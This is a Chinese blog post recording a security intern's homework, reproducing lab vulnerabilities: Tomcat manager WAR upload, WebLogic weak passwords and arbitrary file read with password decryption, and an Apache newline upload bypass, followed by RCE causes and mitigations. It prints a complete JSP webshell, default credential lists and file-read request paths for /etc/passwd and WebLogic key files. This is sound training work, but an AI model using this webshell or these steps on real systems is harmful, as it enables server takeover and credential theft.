网安实习第八天作业(23组)

已于 2024-09-11 21:59:08 修改
阅读量334 收藏 4
点赞数 3
文章标签: eureka 云原生
于 2024-09-05 00:30:39 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_62835948/article/details/141907070
版权

目录

在vps安装docker和docker compose

复现课上漏洞,同时说明成因

1.tomcat8

2.weblogic弱口令/任意文件读取

存在弱口令时

不存在弱口令时(任意文件读取)

3.apache 换行解析

各漏洞成因

tomcat

weblogic

httpd

三.RCE漏洞的原理、利用条件及解决方案

原理

利用条件

解决方案

在vps安装docker和docker compose

复现课上漏洞,同时说明成因

1.tomcat8

进入靶场拉取拉取镜像

启动靶场:

docker-compose up -d

 关闭靶场:

docker-compose down

 靶场的启动与关闭状态:

查看靶场状态:

docker ps -a

 

靶场映射到了vps8080端口

从浏览器访问靶场:

构建木马(.jsp)

<%!    class U extends ClassLoader {        U(ClassLoader c) {            super(c);        }        public Class g(byte[] b) {            return super.defineClass(b, 0, b.length);        }    }     public byte[] base64Decode(String str) throws Exception {        try {            Class clazz = Class.forName("sun.misc.BASE64Decoder");            return (byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str);        } catch (Exception e) {            Class clazz = Class.forName("java.util.Base64");            Object decoder = clazz.getMethod("getDecoder").invoke(null);            return (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, str);        }    }%><%    String cls = request.getParameter("passwd");    if (cls != null) {        new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(pageContext);    }%>

生成shell.war

jar -cvf shell.jsp shell.war

进入Manager App

登录存在弱口令:

账号:tomcat

密码:tomcat

登录成功,此时上传木马文件

此时你会发现文件列表中多了一个shell

蚁剑入侵成功

 

2.weblogic弱口令/任意文件读取

启动靶场

访问target:7001/console

存在弱口令时

weblogic常见弱口令总结

  • system:password
  • weblogic:weblogic
  • admin:secruity
  • joe:password
  • mary:password
  • system:sercurity
  • wlcsystem: wlcsystem
  • weblogic:Oracle@123

发现存在弱口令weblogic/Oracle@123

不存在弱口令时(任意文件读取)

此时就要用到任意文件读取了

target:7001/hello/file.jsp?path=/etc/passwd读取密码文件

得到密文

root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin libuuid:x:100:101::/var/lib/libuuid: syslog:x:101:104::/home/syslog:/bin/false

weblogic密码使用AES(老版本3DES)加密,对称加密可解密,只需要找到用户的密文与加密时的密钥即可。这两个文件均位于base_domain下,名为`SerializedSystemIni.dat`和`config.xml`,在本环境中为`./security/SerializedSystemIni.dat`和`./config/config.xml`(基于当前目录`/root/Oracle/Middleware/user_projects/domains/base_domain`)
 

咱们先找密文:

target:7001/hello/file.jsp?path=security/SerializedSystemIni.dat

因为SerializedSystemIni.dat是二进制文件,所以使用bp抓包

发送到repeater,发现返回乱码

AES加密应该是64位,这里显示63位,进入hex,选择最后64位,右键选择保存至文件

如法炮制,找密钥文件

target:7001/hello/file.jsp?path=config/config.xml

 

找到manager-password标签,后面就是aes加密过的密码

使用vulhub这个环境下自带的decrypt目录下的weblogic_decrypt.jar,解密密文

java -jar weblogic_decrypt.jar

 后面的构建war文件上传,蚁剑链接即可,和前面步骤一样

3.apache 换行解析

漏洞路径:

~/vulhub/httpd/CVE-2017-15715

 网站界面

 

上传php文件会被拦截

文件后面加入换行符(16进制)\x0A,成功上传 

此时可构建一句话木马,使用冰蝎攻击

各漏洞成因

tomcat

弱口令:密码太简单,容易被爆破或猜测

后台文件上传:Tomcat支持在后台部署war文件,可以直接将webshell部署到web目录下,且没有对上传文件进行过滤

weblogic

存在弱口令

对用户输入内容没有进行限制与过滤

httpd

换行:Apache HTTP服务器在处理文件上传或URL请求时,由于配置错误或解析漏洞,导致当文件名中包含换行符(\x0a)时,服务器可能错误地将文件解析为可执行脚本(如PHP),从而允许执行恶意代码。

RCE:Druid是一个常用的数据库连接池组件,在某些版本中,由于未对外部输入进行充分验证和过滤,攻击者可以通过构造恶意请求,利用Druid的某些功能执行任意代码,从而控制服务器。

三.RCE漏洞的原理、利用条件及解决方案

原理

RCE(远程代码执行)漏洞的原理在于攻击者能够向目标系统发送恶意输入,这些输入被目标系统不当处理或未进行充分验证,导致系统执行了攻击者指定的代码。这通常发生在应用程序需要从用户那里接收输入,并将其作为代码或命令的一部分来执行时。如果应用程序没有对这些输入进行严格的验证和过滤,攻击者就可以构造恶意输入,从而控制目标系统。

具体来说,RCE漏洞可能发生在以下几种情况:

  1. 系统命令注入:在Web应用中,如果应用程序在执行系统命令时使用了用户输入的数据且未进行充分过滤,就可能出现命令注入漏洞。攻击者可以通过注入恶意命令来执行任意代码。
  2. 代码注入:在动态脚本语言中较为常见,如PHP、Python等。如果应用程序允许用户输入的内容被直接作为代码执行,就可能出现代码注入漏洞。
  3. 模板注入:当服务器端模板引擎在处理用户输入时没有进行充分的安全检查,攻击者可以通过构造恶意输入来执行任意代码。
  4. 反序列化漏洞:如果应用程序在反序列化用户输入的数据时没有进行充分的安全检查,攻击者可以构造恶意的序列化数据,导致在反序列化过程中执行任意代码。
利用条件

RCE漏洞的利用条件主要包括以下几点:

  1. 存在未经验证的输入:目标系统需要从用户那里接收输入,并且这些输入被用于执行代码或命令。
  2. 输入处理不当:目标系统没有对用户输入进行严格的验证和过滤,或者验证和过滤机制存在缺陷。
  3. 代码执行权限:攻击者需要能够构造出被目标系统执行的恶意代码或命令。
  4. 系统配置缺陷:目标系统的配置可能存在缺陷,使得攻击者能够更容易地利用RCE漏洞。
解决方案

针对RCE漏洞,可以采取以下解决方案来降低风险:

  1. 严格验证和过滤用户输入:对所有用户输入进行严格的验证和过滤,确保它们符合预期的格式和类型,并且不包含恶意代码或命令。
  2. 使用安全的编程实践:避免使用不安全的函数或方法,如eval()、system()等,这些函数或方法可能会执行用户输入的代码或命令。
  3. 最小化权限:确保应用程序以最小权限运行,即使发生RCE漏洞,攻击者也只能获得有限的访问权限。
  4. 使用安全的库和框架:选择经过安全审计和广泛使用的库和框架,它们通常包含更多的安全特性和修复了更多的安全漏洞。
  5. 定期更新和修补:定期更新和修补应用程序及其依赖的库和框架,以修复已知的安全漏洞。
  6. 监控和日志记录:实施监控和日志记录机制,以便在发生安全事件时能够及时发现和响应。
情沫192
关注
网安实习第六天作业23
qq_62835948的博客
09-03 217
利用burpsuite的CSRF token tracker进行攻击。构造payload:(此处新建一个txt文件放到phpstudy中)从url框中发现此处传递参数是url,用http协议进行的访问。修改个人信息并抓包,发现是GET请求,则构造恶意链接。那么思路就是用file让服务器访问自己的本地文件。无法构造恶意链接,写html文档。抓包发现是POST请求。直接输入到url框内。
网安实习第二天作业23,730)
qq_62835948的博客
08-28 544
工具:Xrary根据自己漏洞库进行漏洞扫描Gopy更注重于信息收集DNS(Domain Name System,域名系统)解析是将域名转换为 IP 地址的过程。
网安实习第五天作业23
qq_62835948的博客
09-05 686
SQL 注入主要针对使用数据库的 Web 应用程序。当 Web 应用程序与数据库进行交互时,如果没有对用户输入的数据进行充分的验证和过滤,就可能成为 SQL 注入攻击的目标。攻击方式:用户在与 Web 应用程序交互的输入框、URL 参数等地方输入恶意 SQL 语句,若该程序没有过滤程序,则会导致用户输入被当作数据库语句执行。
网安实习第一天作业(730)
qq_62835948的博客
08-28 322
这里可以看出,交叉攻击两个payload集是一一对应关系,集束攻击则会一对多进行遍历。再次请求,讲密码在burpsuite里改为正确的密码,查看拦截的响应。将登录请求发送到repeater,点击“发送”可查看返回的页面渲染。5.双网卡:一台电脑安装两个网卡,一个面向内网,一个面向外网。开启拦截,输入错误的账号密码进行登录,被拦截,可看到账号密码。将登录请求拦截,发送到intruder,选择狙击手模式。将密码改为正确的密码,再次查看渲染。1.NAT端口映射或网络地址转换。此处选择两个变量,其他操作同上。
2022东南大学网安916专硕上岸经验帖
I_think_I_like
05-29 8787
2022东南大学网络空间安全916专硕上岸经验帖
网安毕业论文(毕设)课题汇总
jdkfsh的博客
06-18 1488
丹成学长,搜集分享最新的软件工程业专业毕设选题,难度适中,适合作为毕业设计,大家参考。相对容易工作量达标题目新颖🧿选题指导, 项目分享:见文末**毕设帮助, 选题指导, 项目分享: **
爱立信实习第一周的感受
weixin_30823683的博客
07-08 179
找了半个学期的实习单位,最后没去淘宝,没去腾讯,而选择了去爱立信。 一开始 ,我是不打算去爱立信的,因为爱立信主要是做通信的,而我又没有什么通信基础,感觉去了之后可能不会有优势。于是我拒了offer,但是后来爱立信的HR找到我们老师,让老师找我谈话,老师跟我讲了半个小时的爱立信怎么怎么好,过了两天,HR给我打来电话,让我再考虑考虑。但是,那时候,我还是不太想去,于是又拒了,那时候感觉我的r...
嵌入式的选择------
abcdefg的专栏
08-13 1901
(据说是一位北大软院前辈写的)  理想与规划(软件需求分析阶段,确定我们要做什么) 我觉得有相当多的新生对未来的理想还没有规划好,这也正常,因为有许多人是半路出家来到这里的,他们没有想过自己的未来会有这样一种改变。大多数原来有计算机基础的,看过我的贴子基本上已经心里有数了。不管以前基础如何,大家都要有个目标,比如说将来要嫁入微软或者IBM这样的豪门也好,或者是将来去华为、中兴等国企做网络通
温柔小薛的信息安全学习实记录
温柔小薛的博客
10-20 2609
个人介绍 本人qq %39%35%37%37%32%32%36%31%30
双非大学四年Apache PPMC 拿过大厂offer考研.
华鑫的专栏
04-30 808
我经常自我emo,我懒惰,我虚伪,我不孝。我心理变态,我精神分裂。本人江西吉安人,家离井冈山卷烟厂很近,24届毕业生,本科毕业于南昌大学,专业信息管理与信息系统,研究。cv厂面试,出差的那个工作,凉经。搞了三年区块链的科研,试着在Boss上随便投了一下,只有一个找了我,一查是海外web3的链游,真的绷。之前二面让我推到清明节后,结果hr跟我说项目那边有问题,我很好,只是项目饱和好像不招人了,会尽力。中旬三面,面试的时候也问了期望薪资和别的信息,我以为已经敲定了呢,说一周内给结果,现在都快五月了,打。
浙大计算机跨专业考研心路历程记录
CODER的博客
05-12 6765
1.大二下,专业课很多,蹭了许多课,但感觉还是浅尝辄止,没有深入研究下去,这样的我,学到了皮毛,但深入的一点都不会 (汇编,离散,Linux程序设计,密码学) 我好像总觉得自己很忙 但一和别人比较 我其实一点都不忙 我空的很呐 每天只能做两三道洛谷的题,我的方法对嘛?...
2019计算机保研经验记录:南开软院、武大、信工所、南大软院、哈工深
aha_liu的博客
11-02 5864
目录 一、保研的前期准备 1.提前深入了解本校保研政策 2.排名是门槛,其他是加分项,一定要有项目经历 3.复习专业知识 4.信息收集 二、具体学校的记录 1.南开软院夏令营 (1)基本情况介绍 (2)考核 2.武大计院夏令营(本院) (1)基本情况介绍 (2)考核 3.中科院信工所 (1)基本情况介绍 (2)考核 4.南大软院 (1)基本情况介绍 (2)考核 ...
2021级南航计算机专硕829备考记录
qq_43385031的博客
10-23 1033
关键字:南京航空航天大学 南航计算机考研 南航计算机专硕 南航电子信息 软工 网安 计算机科学与技术 写在前面:不接机构,不接1对1,唠一下进度可以,别找我讲课,只想趁着能记住,找个地方记录一下这一年一个普通考研人的全程真实考研心路历程,供以后自己回看,每个人都有自己的备考过程,欢迎大家批评,qq1250083392。 南京航空航天大学,本人最终上岸成绩(不能发图) 初试: 政治71+英语60+数学二104+829专业课129=364 排名:79 复试: 笔试85+面试175.6=260.6
Eureka原理实践:构建高可用、可扩展的微服务架构
运维人生
09-25 1138
EurekaEureka Server(服务注册中心)和Eureka Client(服务实例)两个核心成。EurekaServer负责维护服务注册表,存储所有可用服务的实例信息,如IP地址、端口号、服务名等。EurekaClient则嵌入到每个微服务应用中,分为服务提供者客户端和服务消费者客户端。服务提供者客户端在启动时向EurekaServer注册自身信息,并定期发送心跳信号以维持注册状态;服务消费者客户端通过查询EurekaServer获取所需服务的实例列表,并与之建立连接进行通信。
Docker的实践应用举例
shiming8879的博客
09-27 988
Docker Hub上提供了大量用于主流Linux发行版的Docker映像,但有时候我们需要根据自己的需求来创建自定义的Linux映像。通过使用Dockerfile,我们可以很容易地创建一个包含特定软件包和配置的Linux映像。例子:假设我们需要一个基于Alpine Linux的Docker映像,这个映像需要包含Python和一些常用的Python库。我们可以编写一个Dockerfile,在文件中指定使用Alpine Linux作为基础镜像,并添加RUN指令来安装Python和所需的库。
OJ在线评测系统 在Linux虚拟机搭建Docker 概念 入门 安装
我见玫瑰生于荆棘之上
09-27 596
为什么要用docker容器技术为了提升系统的安全性 把不同的程序和宿主机进行隔离使得某个程序 应用的执行不会影响到系统本身docker技术可以实现程序和宿主机的隔离容器可以理解成对一系列应用程序、服务和环境的封装 从而把程序运行在一个隔离的 封闭的 隐私的空间内 对外整体提供服务可以把一个容器理解成一个新的电脑 定制化操作系统镜像:用来创建容器的安装包 可以理解为给电脑安装操作系统的系统镜像容器:通过镜像来创建的一套运行环境 一个容器内可以运行多个程序 可以理解为一个电脑实例。
Docker
最新发布
u014644574的博客
09-27 148
【代码】Docker。
Docker的基本概念和优势
Chujun123528的博客
09-27 710
Docker Hub上提供了大量用于主流Linux发行版的Docker映像,但有时候我们需要根据自己的需求来创建自定义的Linux映像。通过使用Dockerfile,我们可以很容易地创建一个包含特定软件包和配置的Linux映像。例子:假设我们需要一个基于Alpine Linux的Docker映像,这个映像需要包含Python和一些常用的Python库。我们可以编写一个Dockerfile,在文件中指定使用Alpine Linux作为基础镜像,并添加RUN指令来安装Python和所需的库。
github网安项目
04-24
GitHub是一个基于Web的代码托管平台,它提供了版本控制和协作功能,让开发者可以方便地共享和管理代码。在GitHub上,有很多与网安相关的项目,这些项目致力于保护网络安全、防止黑客攻击和提高系统的安全性。以下是一些常见的GitHub网安项目: 1. OWASP(开放式Web应用程序安全项目):OWASP是一个致力于提高Web应用程序安全性的国际织。他们在GitHub上维护了一系列开源项目,包括安全工具、漏洞测试和安全指南等。 2. Metasploit:Metasploit是一个广泛使用的渗透测试框架,它提供了一系列工具和资源,帮助安全专家评估和增强系统的安全性。Metasploit在GitHub上有一个官方仓库,开发者可以在这里获取最新的代码和贡献自己的改进。 3. Snort:Snort是一个开源的入侵检测系统(IDS),它可以监测网络流量并检测潜在的攻击行为。Snort的代码托管在GitHub上,开发者可以参与到项目中,改进和定制自己的IDS规则。 4. Nmap:Nmap是一个网络扫描和主机发现工具,它可以帮助安全专家评估网络的安全性。Nmap的源代码也在GitHub上开放,用户可以自由地访问和贡献代码。 5. Security Shepherd:Security Shepherd是一个教育性的Web应用程序,旨在帮助开发者学习和理解常见的Web安全漏洞。它提供了一系列的挑战和实验,供用户测试和提高自己的安全技能。Security Shepherd的代码也在GitHub上开源。 这些项目只是GitHub上众多网安项目的一小部分,你可以通过在GitHub上搜索关键词来找到更多与网安相关的项目。希望这些信息对你有帮助!
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值